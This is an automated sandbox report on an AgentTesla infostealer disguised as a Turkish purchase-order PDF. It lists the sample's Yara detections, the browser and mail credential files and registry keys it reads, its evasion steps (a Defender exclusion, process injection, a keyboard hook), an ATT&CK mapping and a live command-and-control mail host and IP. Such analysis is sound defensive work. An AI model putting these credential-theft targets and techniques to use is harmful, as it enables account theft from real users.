                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeQueries volume information: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 13.2.ctsdvwT.exe.409f328.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ctsdvwT.exe.43f9d68.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ctsdvwT.exe.40d9f48.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ctsdvwT.exe.43bf148.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3b92c00.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ctsdvwT.exe.43f9d68.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ctsdvwT.exe.40d9f48.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ctsdvwT.exe.43bf148.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ctsdvwT.exe.409f328.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3b92c00.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.1325496333.00000000044B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.1545932299.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.1486766690.00000000043BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1575415406.000000000409F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1325496333.0000000003B92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe PID: 7192, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 7644, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 7752, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 7952, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 13.2.ctsdvwT.exe.409f328.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ctsdvwT.exe.43f9d68.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ctsdvwT.exe.40d9f48.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ctsdvwT.exe.43bf148.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3b92c00.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ctsdvwT.exe.43f9d68.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ctsdvwT.exe.40d9f48.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ctsdvwT.exe.43bf148.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ctsdvwT.exe.409f328.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3b92c00.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.1325496333.00000000044B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.1545932299.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.1486766690.00000000043BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2544912217.0000000002C3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1575415406.000000000409F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1325496333.0000000003B92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2545517189.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.1548552550.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe PID: 7192, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe PID: 7348, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 7644, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 7752, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 7952, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 8020, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 13.2.ctsdvwT.exe.409f328.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ctsdvwT.exe.43f9d68.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ctsdvwT.exe.40d9f48.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ctsdvwT.exe.43bf148.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3b92c00.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ctsdvwT.exe.43f9d68.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ctsdvwT.exe.40d9f48.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ctsdvwT.exe.43bf148.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.ctsdvwT.exe.409f328.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3b92c00.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.1325496333.00000000044B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.1545932299.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.1486766690.00000000043BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1575415406.000000000409F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1325496333.0000000003B92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe PID: 7192, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 7644, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 7752, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 7952, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    Registry Run Keys / Startup Folder                    		112
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		24
                    System Information Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		1
                    Non-Standard Port                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    Registry Run Keys / Startup Folder                    		3
                    Obfuscated Files or Information                    		Security Account Manager211
                    Security Software Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                    Software Packing                    		NTDS2
                    Process Discovery                    		Distributed Component Object Model21
                    Input Capture                    		11
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Timestomp                    		LSA Secrets141
                    Virtualization/Sandbox Evasion                    		SSH1
                    Clipboard Data                    		Fallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Masquerading                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                    Virtualization/Sandbox Evasion                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt112
                    Process Injection                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                    Hidden Files and Directories                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1446058 Sample: baymarhavuzculuk Sat#U0131n... Startdate: 22/05/2024 Architecture: WINDOWS Score: 100 32 mail.saralgumruk.com 2->32 46 Found malware configuration 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 Multi AV Scanner detection for submitted file 2->50 52 10 other signatures 2->52 8 baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe 4 2->8         started        11 ctsdvwT.exe 3 2->11         started        13 ctsdvwT.exe 2 2->13         started        signatures3 process4 signatures5 54 Adds a directory exclusion to Windows Defender 8->54 56 Injects a PE file into a foreign processes 8->56 15 baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe 1 5 8->15         started        20 powershell.exe 23 8->20         started        58 Multi AV Scanner detection for dropped file 11->58 60 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 11->60 62 Machine Learning detection for dropped file 11->62 22 ctsdvwT.exe 2 11->22         started        24 ctsdvwT.exe 13->24         started        process6 dnsIp7 34 mail.saralgumruk.com 185.81.155.88, 587, 59154 RADORETR Turkey 15->34 28 C:\Users\user\AppData\Roaming\...\ctsdvwT.exe, PE32 15->28 dropped 30 C:\Users\user\...\ctsdvwT.exe:Zone.Identifier, ASCII 15->30 dropped 36 Tries to steal Mail credentials (via file / registry access) 15->36 38 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->38 40 Installs a global keyboard hook 15->40 42 Loading BitLocker PowerShell Module 20->42 26 conhost.exe 20->26         started        44 Tries to harvest and steal browser information (history, passwords, etc) 24->44 file8 signatures9 process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe37%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                    baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe37%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://account.dyn.com/0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://mail.saralgumruk.com0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    mail.saralgumruk.com
                    		185.81.155.88
                    		truetrue
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://account.dyn.com/baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000005.00000002.1325496333.00000000044B1000.00000004.00000800.00020000.00000000.sdmp, baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000005.00000002.1325496333.0000000003B92000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.1486766690.00000000043BF000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000C.00000002.1545932299.0000000000402000.00000040.00000400.00020000.00000000.sdmp, ctsdvwT.exe, 0000000D.00000002.1575415406.000000000409F000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://mail.saralgumruk.combaymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000009.00000002.2545517189.0000000002D39000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namebaymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000005.00000002.1320959148.00000000028D2000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.1485685529.0000000003102000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000D.00000002.1568438809.0000000002DE5000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      185.81.155.88
                      		mail.saralgumruk.comTurkey
                      		42926RADORETRtrue

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1446058
                      Start date and time:2024-05-22 22:03:10 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 7m 47s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:18
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
                      renamed because original name is a hash value
                      Original Sample Name:baymarhavuzculuk Satnalma Siparii 20230331,pdf.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@12/9@1/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 267
                      • Number of non-executed functions: 8
                      Cookbook Comments:
                      • Found application associated with file extension: .exe

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 2.19.126.137, 2.19.126.163
